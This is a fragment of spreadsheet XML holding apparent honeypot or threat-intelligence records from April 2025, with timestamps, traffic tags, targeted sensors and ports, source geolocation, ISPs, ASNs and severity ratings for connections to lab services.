    <s v="Gujarat"/>
    <s v="Surat"/>
    <s v="Surat"/>
    <s v="1255364"/>
    <s v="395003"/>
    <s v="21.1702"/>
    <s v="72.8311"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="Nib"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:ac4b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1422"/>
    <x v="1422"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T23:39:08"/>
    <d v="2025-02-26T02:26:30"/>
    <d v="2025-04-16T23:39:08"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_POSTGRES_H37"/>
    <s v="389&amp;&amp;5432&amp;&amp;21"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="101"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Gemeente Amsterdam"/>
    <s v="Amsterdam"/>
    <s v="2759794"/>
    <s v="1012"/>
    <s v="52.3676"/>
    <s v="4.90414"/>
    <s v="214940"/>
    <s v="KPROHOST LLC"/>
    <s v="Kprohost LLC"/>
    <s v="hosting"/>
    <s v="Kprohost"/>
    <s v="2019-08-23"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command"/>
    <s v="{Data_LDAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': ''}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d90:d4f6"/>
    <s v="C-I"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1423"/>
    <x v="1423"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T23:25:19"/>
    <d v="2025-04-16T23:25:19"/>
    <d v="2025-04-16T23:25:19"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MA"/>
    <s v="Massachusetts"/>
    <s v="Suffolk"/>
    <s v="Boston"/>
    <s v="4930956"/>
    <s v="02112"/>
    <s v="42.3601"/>
    <s v="-71.0589"/>
    <s v="701"/>
    <s v="UUNET"/>
    <s v="Verizon Business"/>
    <s v="consumer"/>
    <s v="Verizon Business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ad4c:a955"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1424"/>
    <x v="1424"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T23:23:23"/>
    <d v="2025-04-16T23:23:23"/>
    <d v="2025-04-16T23:23:23"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Ludhiana"/>
    <s v="Samrāla"/>
    <s v="1257503"/>
    <s v="NA"/>
    <s v="30.836"/>
    <s v="76.1932"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:94"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1425"/>
    <x v="1425"/>
    <s v="ec2-13-216-239-98.compute-1.amazonaws.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T23:21:18"/>
    <d v="2025-04-16T23:17:00"/>
    <d v="2025-04-16T23:21:18"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_HTTPS_HC1"/>
    <s v="8443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Loudoun"/>
    <s v="Ashburn"/>
    <s v="4744870"/>
    <s v="20149"/>
    <s v="39.0438"/>
    <s v="-77.4874"/>
    <s v="14618"/>
    <s v="Amazon.com, Inc."/>
    <s v="Amazon.com, Inc."/>
    <s v="hosting"/>
    <s v="Amazon Technologies Inc"/>
    <s v="None"/>
    <s v="AT-88-Z"/>
    <s v="2021-02-10"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_HTTPS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dd8:ef62"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1426"/>
    <x v="1426"/>
    <s v="host-79-23-69-153.retail.telecomitalia.it&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T23:16:45"/>
    <d v="2025-04-10T00:27:18"/>
    <d v="2025-04-16T23:16:45"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="57"/>
    <s v="The Marches"/>
    <s v="Ascoli Piceno"/>
    <s v="Cupra Marittima"/>
    <s v="3177685"/>
    <s v="NA"/>
    <s v="43.0191"/>
    <s v="13.8617"/>
    <s v="3269"/>
    <s v="Telecom Italia S.p.A."/>
    <s v="INTERBUSINESS"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4f17:4599"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1427"/>
    <x v="1427"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T23:10:35"/>
    <d v="2024-04-20T07:20:08"/>
    <d v="2025-04-16T23:10:35"/>
    <n v="34"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_SMB_H30"/>
    <s v="52492&amp;&amp;1433&amp;&amp;445&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="RJ"/>
    <s v="Rio de Janeiro"/>
    <s v="Rio de Janeiro"/>
    <s v="Rio de Janeiro"/>
    <s v="3451190"/>
    <s v="20000-000"/>
    <s v="-22.9068"/>
    <s v="-43.1729"/>
    <s v="7738"/>
    <s v="V tal"/>
    <s v="V tal"/>
    <s v="business"/>
    <s v="Telemar Norte Leste S.A."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (187.125.100.211,52006)}&amp;&amp;{Data_SMB:Incoming connection (187.125.100.211,58829)}&amp;&amp;{Data_SMB:Incoming connection (187.125.100.211,58924)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (187.125.100.211,65283)}&amp;&amp;{Data_SMB:Incoming connection (187.125.100.211,61487)}&amp;&amp;{Data_SMB:Incoming connection (187.125.100.211,61548)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (187.125.100.211,62271)}&amp;&amp;{Data_SMB:Incoming connection (187.125.100.211,62385)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bb7d:64d3"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1428"/>
    <x v="1428"/>
    <s v="d64-180-142-239.bchsia.telus.net"/>
    <x v="0"/>
    <d v="2025-04-16T23:06:48"/>
    <d v="2025-04-16T23:06:48"/>
    <d v="2025-04-16T23:06:48"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="CA"/>
    <s v="Canada"/>
    <s v="BC"/>
    <s v="British Columbia"/>
    <s v="Fraser Valley"/>
    <s v="Abbotsford (Highway 11)"/>
    <s v="5881791"/>
    <s v="V2S"/>
    <s v="49.0495"/>
    <s v="-122.286"/>
    <s v="852"/>
    <s v="ASN852"/>
    <s v="TELUS Communications Inc"/>
    <s v="consumer"/>
    <s v="Telus-Fibre"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1996-05-18 04:00:00"/>
    <s v="2025-05-19 04:00:00"/>
    <s v="2024-04-17 09:15:57"/>
    <s v="['DNS24.TELUS.CA', 'DNS24.TELUS.COM']"/>
    <s v="MarkMonitor, Inc."/>
    <s v="['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited', 'clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)', 'clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)', 'clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)', 'serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited)', 'serverTransferProhibited (https://www.icann.org/epp#serverTransferProhibited)', 'serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited)']"/>
    <s v="None"/>
    <x v="15"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:40b4:8eef"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1429"/>
    <x v="1429"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T22:59:23"/>
    <d v="2025-04-16T22:53:19"/>
    <d v="2025-04-16T22:59:23"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="Multiplay-Prepaid"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d1:5789"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1430"/>
    <x v="1430"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T22:55:28"/>
    <d v="2025-04-16T20:12:57"/>
    <d v="2025-04-16T22:55:28"/>
    <n v="116"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H45"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="21859"/>
    <s v="Zenlayer Inc"/>
    <s v="Hongkong Union Information Technology CoLimited"/>
    <s v="business"/>
    <s v="Hongkong Union Information Technology Co., Limited"/>
    <s v="2014-12-01"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2dcf:acde"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1431"/>
    <x v="1431"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T22:37:45"/>
    <d v="2025-04-16T22:37:45"/>
    <d v="2025-04-16T22:37:45"/>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3d01:8795"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1432"/>
    <x v="1432"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T22:24:55"/>
    <d v="2025-04-15T17:45:59"/>
    <d v="2025-04-16T22:24:55"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="NA"/>
    <s v="Seoul (Toegye-ro)"/>
    <s v="1835848"/>
    <s v="NA"/>
    <s v="37.5614"/>
    <s v="126.996"/>
    <s v="9318"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="business"/>
    <s v="broadNnet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d62:2dbf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1433"/>
    <x v="1433"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T22:24:45"/>
    <d v="2025-04-16T22:24:45"/>
    <d v="2025-04-16T22:24:45"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Kartal"/>
    <s v="Pendik"/>
    <s v="740616"/>
    <s v="NA"/>
    <s v="40.8994"/>
    <s v="29.2108"/>
    <s v="16135"/>
    <s v="TURKCELL-AS"/>
    <s v="Turkcell Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b05b:8d99"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1434"/>
    <x v="1434"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T22:22:46"/>
    <d v="2025-04-16T18:38:46"/>
    <d v="2025-04-16T22:22:46"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b638:b983"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1435"/>
    <x v="1435"/>
    <s v="59-125-213-218.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T22:21:46"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-16T22:21:46"/>
    <n v="22"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H6&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H6"/>
    <s v="53&amp;&amp;53201&amp;&amp;5900"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.033"/>
    <s v="121.565"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:3b7d:d5da"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1436"/>
    <x v="1436"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T22:11:35"/>
    <d v="2025-01-22T06:01:38"/>
    <d v="2025-04-16T22:11:35"/>
    <n v="122"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H5"/>
    <s v="5900&amp;&amp;64952&amp;&amp;50395&amp;&amp;52366&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Kolkata"/>
    <s v="Kolkata (Sovabazar)"/>
    <s v="1275004"/>
    <s v="700073"/>
    <s v="22.5969"/>
    <s v="88.3674"/>
    <s v="45804"/>
    <s v="Meghbela Cable &amp; Broadband Services (P) Ltd"/>
    <s v="Meghbela Broadband"/>
    <s v="residential"/>
    <s v="Meghbela Cable &amp; Broadband Services (P) Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:670a:d0fa"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1437"/>
    <x v="1437"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T22:10:21"/>
    <d v="2025-04-14T17:00:56"/>
    <d v="2025-04-16T22:10:21"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&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NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
